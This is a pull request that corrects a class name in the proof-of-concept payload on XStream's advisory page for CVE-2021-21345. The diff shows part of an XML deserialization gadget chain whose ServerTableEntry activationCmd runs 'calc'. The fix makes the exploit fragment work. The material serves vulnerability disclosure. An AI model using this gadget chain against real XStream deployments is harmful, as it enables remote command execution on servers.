### PR TITLE
Fix ServerTableEntry class name in CVE-2021-21345 POC.

### DIFF
--- a/xstream-distribution/src/content/CVE-2021-21345.html
+++ b/xstream-distribution/src/content/CVE-2021-21345.html
@@ -77,7 +77,7 @@
                     &lt;/context&gt;
                   &lt;/bridge&gt;
                 &lt;/bridge&gt;
-                &lt;jaxbObject class='com.sun.corba.se.impl.activation.com.sun.corba.se.impl.activation.ServerTableEntry'&gt;
+                &lt;jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'&gt;
                   &lt;activationCmd&gt;calc&lt;/activationCmd&gt;
                 &lt;/jaxbObject&gt;
               &lt;/dataSource&gt;


### PR DESCRIPTION
Fix ServerTableEntry class name in CVE-2021-21345 POC.

issue#245